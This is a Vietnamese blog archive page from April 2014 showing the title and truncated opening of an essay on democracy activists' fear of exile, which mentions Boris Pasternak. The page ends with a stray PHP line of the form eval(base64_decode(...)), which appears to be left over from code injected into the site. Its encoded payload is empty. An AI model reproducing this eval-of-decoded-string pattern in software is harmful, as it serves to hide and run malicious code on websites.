Archive for April 9th, 2014

Chọn lựa của đời người

Chọn lựa của đời người

Nỗi lo sợ lớn nhất của một nhà tranh đấu cho tự do dân chủ của một đất nước không phải là sợ bị tù mà bị sống lưu vong, bởi vì với phần đông, đi là hết. Boris Pasternak không phải là nhà đấu tranh chính trị nhưng khi bị hăm

04.9.2014 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>